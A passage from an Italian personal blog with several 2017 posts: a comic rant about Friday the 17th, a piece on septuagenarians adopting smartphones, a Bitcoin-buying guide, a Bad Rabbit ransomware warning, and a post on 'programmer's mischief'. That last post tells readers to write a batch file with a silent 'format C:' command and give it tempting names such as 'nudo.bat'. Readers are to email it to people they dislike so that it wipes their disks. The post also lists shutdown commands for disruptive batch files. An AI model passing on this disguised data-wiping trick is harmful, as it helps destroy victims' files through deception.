venerdì 17 novembre 2017

Eptacaidecafobia.




Questo post e' rivolto a te dolce eptacaidecafoba che mi sposti tutto il cavisterio dei pc e ne approfitti perche' mi alzo tardi per colpire il pavimento del tinello, per esporti controsensi sulle disgrazie che sto venerdi' 17 si attira che poi non capisco perche' in Spagna, Grecia e vari paesi latinamericani. dove troviamo un sacco di triscadecafobici la cui sfiga e' proiettata sul venerdi' e anche il martedi' 13...bah iniziamo con le disgrazie diciassettevoli parlando

delle maniache quasi piediache delle pulizie come te, che pagano la donna delle pulizie e nel contempo puliscono la casa prima che arrivi, cioe’ scuciono dindini a quella li che viene a casa per non fare una mazza in quanto pulire sul pulito e' uno spreco di acqua e soprattutto di additivi inquinanti che mi ritrovo in quel di Casalcoso Marino..

E che dire sul fatto di passare la cera sull’asse del water pur di non fare brutta figura, datosi che il maschio della famiglia piscia sempre fuori (non faccio nomi) perche' non ha mai capito la storia dell’asse.. alza l’asse abbassa l’asse..boh questo e’ il terzo mistero di Casalbrodino.

Cosi’ arriva la “signora” delle pulizie, contenta come un grillo (non quello del fivestar), si infila le ciabatte si mette la cuffietta in capo, si fa il caffe’, legge il tuo giornale fa una passata sul mio pc si scatta due selfate col tuo smartsette e mezzo e poi telefona tutto il tempo col cellulare alla cugina, assunta anche lei da qualche sciroccata, che sta nell’europa ovest, per pulire sti locali sempre puliti dove puoi mangiare sul pavimento e le blatte entrano solo per farsi una slittata.

Finisco con le disgrazie guardando in quel di Porcaro ed esattamente in Via Italia... mi domando e dico alla faccia del venerdi' 17 del perche’ del lavaggio delle strade.

Ma perche’ sprecare acqua potabile alla faccia del negretto che si fa 15 km a piedi con il, canestro sulle spalle per andare a prender acqua da una pozza... ebbene... noi la buttiamo.

Io mi sono sempre chiesto e non me lo sono mai spiegato come disse il vento alla vela.

E’ come lavare la suola delle scarpe.

Perche’ lavare le strade e non i marciapiedi che li deve lavare la nuova impresa scopatrice (e' nel capitolato), insomma in strada tutto sommato ci si passa in auto ma sui marciapiedi dove passano i cristiani e i tir del biscottaro.. che sono?

Fogna a cielo aperto?. Perche’ vorrete mica dirmi che per togliere questi maledetti olii nocivi o residui del ciuingumme basta bagnare le strade con quegli sprizzino virgoletti?

Davvero? Ma allora e’ wonderfulloso.

Ma come mai questi oli si depositano solo in via Italia?

Le altre vie sono immuni? Qualcuno le ha vaccinate di nascosto?

Ma perche’ dico io e scusate la polemichetta, ma se l’auto posteggiata impedisce il lavaggio perche’ mi date la multa e poi la lasciate li e la lavate lo stesso sta cazzo di strada? E se potevate lavarla perche’ mi avete dato la multa a fare?

Ah capisco, era per castigo come i semafori davanti alla Coop.

Basta coi perche’ dolce eptacaidecafoba del venerdi' or dolci triscadecafobici del martes ...convengo con voi che ne’ di venere ne’ di marte non si tromba e non si parte.

Bahh e ribahhh... speriamo meglio nel domani che dovrebbe esser un sabato solatìo se sopravviveremo a questo venerdi' 17 .

E per chi e' a digiuno del vecchio motto sabatino lo educo, accento sulla U.

Non c'e' sabato senza sole

non c'e' cuore senza amore

non c'e' prato senza erba

non c'e' culo senza .....

Parola a Stefano e alla "mossa del cavallo" al bar..












giovedì 16 novembre 2017

Settantenni Analogici.

I veri fighi digitali sono i Settantenni e passa di oggi.
Nati nel ’42, subito dopo la guerra.. ad andar bene da piccoli avevano le scarpe smesse dei fratelli piu' grandi, ad andar male giravano a piedi nudi e non e' il mio caso perche' avevo i sandali.
Quando sono nati la televisione non esisteva, e quel poco di sperimentale che era stato fatto fino al ’39 ando' perduto sotto i bombardamenti della seconda guerra mondiale.

Il telefono qualcuno ce l’aveva, ma mica neanche tutti, la Telecom era di la da venire, la SIP produceva elettricita' e per avere un apparecchio telefonico a casa, in Lombardia ci si rivolgeva alla STIPEL.

Quando compiono vent’anni e' tutto un fermento di innovazione e di benessere, i telefoni di casa si diffondono e li si spostano dal muro al tavolino.
le TV non sono piu' solamente nei locali pubblici o nella villa del vicino dove ti presenti con la sedia in mano, ma la gente inizia ad averle in casa, nascono le prime televisioni “private” (o commerciali come si direbbe oggi).
Le auto non sono piu' solo per ricchi ma possono esser acquistate firmando due kg di cambiali senz'osso.
Dopo altri vent’anni, ormai genitori, spuntano i computer tipo Commodore o Sinclair con potenza a 16bit, i telefoni portatili esistono ma questi si , sono una roba da ricchi.. solo nei film di 007 ci sono telefoni sulle auto.
La televisione analogica e' ormai diffusa in quasi tutte le case e cominciano le zappingate coi telecomandi.
Oggi questi stessi signori li incontri nelle sale d’attesa, dal medico, in posta, che tirano fuori il loro smartphone e iniziano a chattare su Whatsapp, magari col figlio che scrive loro che i nipoti li porta alle due invece che alle quattro.
  
E sono li', col loro indice impacciato a digitare su una tastiera senza tasti (ormai e' tutto touch) messaggi alla moglie per decidere il pranzo e “ti serve qualcosa in farmacia”, magari derisi dal quindicenne a caccia di Pokémon che usa velocemente i pollici per scrivere anziche' le 10 dita sull'Olivetti lettera 22 e che ovviamente manco pensa a cosa facevano i loro nonni come giochi..
la cavallina, il girotondo e le grette o tappi di bottiglia...

In 40 anni hanno visto la loro vita trasformarsi.. i viaggi farsi piu' brevi, le distanze annullate, le videochiamate, che erano roba da Star Trek, diventare pane quotidiano per vedere la nipote che vive in Finlandia o l’amico in vacanza a New York.
Ma i veri fighi sono loro, sopravvissuti a un cambiamento davvero epocale, e scagliati nel mondo digitale che col benestare della Fornero i meno fortunati sono obbligati a lavorare.
Loro che quando son nati manco sapevano di essere analogici…

giovedì 9 novembre 2017

Bitcoin.


Il valore del Bitcoin sempre piu' popolare e richiesto alla data del post e' attorno alle 7.371 Euro (controlla qui in tempo reale) e pensare che ad agosto 2017 era sui 3.600 Euro e nell'agosto 2015 era sotto i 200 Euro.. fate solo attenzione che chi troppo in alto va cade sovente precipitevolissimevolmente..ma tentare non nuoce.
Sei curioso e vuoi comprare Bitcoin ma non sai come fare?
Devi avere un conto Wallet e.. lascia perdere e spendi qualche soldino facendo cosi'..
Vai suTherocktrading, un exchange (un servizio che permette di comprare e vendere crittovalute) con sede a Malta ma gestito da imprenditori italiani.
E' in piedi da parecchio tempo ed e' riconosciuto come piattaforma affidabile e sicura.
Therocktrading parla anche la nostra lingua (nell'home page in alto a destra seleziona la bandiera italiana) quindi il primo approccio nel mondo delle crittovalute avra' cosi' un ostacolo in meno, perche' la possibilità di acquistare, trasferire e rivendere al miglior prezzo possibile e senza intermediario le tue crittovalute, avverra' “parlando” italiano (o se preferisci ovviamente anche inglese)...
il servizio di assistenza via chat su Telegram e' comunque perfetto e senza attese di sorta.
Therocktrading permette di scambiare Bitcoin, Litecoin, Ethereum, Peercoin, Ripple, Zcash e altre crittovalute contro euro o dollaro.
Le commissioni partono dallo 0.20% e possono scendere fino allo 0.03%, in base al volume generato.
Sono a disposizione diverse opzioni per depositare e prelevare EURO, USD e GBP.
Su questa piattaforma la registrazione e' facile e intuitiva... all’utente basta fornire i propri dati e collegare il proprio conto corrente bancario.
Si possono anche versare euro direttamente dal proprio conto corrente a quello di Therocktrading presso Banca Sella... questo bonifico avviene tra conti correnti italiani, quindi risolve alcune problematiche che potrebbero crearsi per i bonifici transfrontalieri.
L’unica cosa richiesta e' indicare (tassativamente) sulla causale dei bonifici un codice di riferimento per l’accredito delle somme sul giusto account.
Ricevuta la notifica dalla banca, entro un paio di giorni lavorativi, il deposito viene accreditato sul proprio conto Therocktrading.
A questo punto si puo' iniziare ad acquistare Bitcoin o altre crittovalute... l’interfaccia e' senza le classiche mille clausole scritti in piccolo a cui siamo avvezzi con le nostre banche ed e' di uso piuttosto intuitivo.
Per chi invece volesse acquistare con carta di credito, il servizio consigliato e affidabile e' l’austriaco Bitpanda qui l'alternativa della form e' l'inglese.
Il post e' terminato e anche i vostri soldini, vi lascio ai fatti attuali visti con gli occhi e la penna di Stefano.











domenica 5 novembre 2017

Le cattiverie di un programmatore.


Considerato che la lunga siccita' e' finita mi sento in vena di far danni sotto una pioggia che cerchera' di spegnere i focolai della valle mentre in piazza ci stanno 4 o 5 persone pernonsocosa e saltando di frasca in palo, per far capire quanto e’ semplice e pericoloso leggere le mail, posto per chi condivide i miei sentimenti bellici due dritte o tre per azzerare un computer di chi vi sta sul biip formattando il suo Hdisco C con poche manovre..donc.. uscite le umbrella e dateci dentro col picci..fate come io...
1) Apro il blocco note
2) scrivo
formatC: /autotest /q /u
Salvo con un nome accattivante secondo la persona a cui mandero’ la posta con estensione .bat
Ad es:
eccomi.bat (se so’ che esiste curiosita’ di vedere il togo tuentinain).
ilmiocane.bat (se la vittima e’ amante di animali amici dell’uomo).
nudo.bat (se e’ amante di altre cose a.mene).
tutto_sul_condominio.bat (questa e’ per il condomino del 5° piano).
come_fare-il_tecnico (per il pistola che dico io).
e la invio a chi voglio male e fa’ l’equilibrista (nel senso che mi sta’ sulle palle)…
Per spiegare il /q (significa,senza chiedere conferma) e il /u (significa, non permettere di essere bloccata la mia manovra distruttiva)..
Chi lo ricevera’, aprendoli si trovera’ il computer azzerato di tutto..di un bel nero che piu’ nero non si puo’..nemmeno col candeggio contrario e nn pretendo alcun bitcoin.
Se invece mi sento magnanimo e voglio sconnettere il suo PC, riavviarlo per poi spegnerlo definitivamente, vado ancora nel blocco note inserisco il seguente codice..shutdown –(comando) e lo salvo in bat..al posto della parola tra parentesi mettero’ ovviamente senza parentesi:
a)
-i : Attivo l’interfaccia utente grafica (shutdown –i )
b) -l : Disconnetto l’utente (shutdown –l)
c)
-r : Riavvio il PC (shutdown –r)
d)
-s : Spengo il computer (shutdown –s)
e)
-t 45 (dove 45 sono i secondi di attesa prima della chiusura di Windows e darete cosi’ il tempo col conteggio alla rovescia alla vittima per dire una preghiera prima della fine). (shutdown –t 45)
f) -f : Chiudo le applicazioni ancora aperte (shutdown –f)
Semplice vero? Dagli amici mi guardi Iddio.. che a xXxX ci penso io.
ps.. nn mi chiedete di aggiustarvi il pc in quanto sapete come scassarvelo da soli e cercate di non seguire il mio scritto italcarliano...ehmm.. ringrazio per il 1mastico di ieri e stavo dimenticando la liturgia odierna del five november secondo togotuentinain. Mi rivolgo ai giovani farisaici che vivono o vegetano per farsi notare 24H sui social da quando si lavano i denti a quando vanno a letto e fanno un continuo mostrare di se' e delle cose che fanno, anche futili e talvolta stupide pur di farse notare...
finito il predicozzo in fase mozza e senza senso, vi lascio alla striscia del buon Ste che vive di politica e..vive bene









venerdì 27 ottobre 2017

Bad Rabbit in arrivo.


Allora ci risiamo con i craccatori che anziche' fare attacchi infilando virus con mail o allegati utilizzano banner pubblicitari o siti internet. (Lella occhio ai vari Buongiorno, Buonasera, Buonanotte).
Per quanto si sa il nuovo ransomware sembra sia arrivato con richiesta di aggiornamento Flask Player e il malcapitato che effettueraì lo scarico otterra' un codice malevolo denominato "infopub.dat".
Il file utilizzera' un primo tool in grado di svelare la password di login del PC e un secondo tool denominato DiskCryptor avente lo scopo di criptare l'intero PC senza alcuna possibilita' (se non pagando) di ri-ottenere i propri dati personali.
Il processo si conclude con una schermata che mostra l'avvenuto attacco la quale integrera' un timer scaduto il quale viene formattata l'intera 
macchina.

 
Quindi fate attenzione altrimenti sarete costretti a sborsare i classici 300 eurini da pagare rigorosamente con moneta Bitcoin altrimenti con la criptazione dei vostri file potrete dare addio agli stessi.
Questo Ramsomware e' stato battezzato coniglio cattivo, al secolo Bad Rabbit e cercate di starne alla larga in quanto vi daranno 40 ore di tempo posdiche' la cifra del riscatto aumentera' in modo esponenziale.


Una precauzione e' quella di creare i file:
c:\windows\infpub.dat
c:\windows\cscc.dat
e rimuovere TUTTE le autorizzazioni, in modo che non possano andare in esecuzione e rimuovere l'ereditarieta' dai due file in questione, una volta copiati in c:\windows.

Dai vado ad aiutare in valle e lascio spazio al buon Stefano.
In Verde le rotte dei Canadair che scaricano acqua ma qui la situazione e' davvero brutta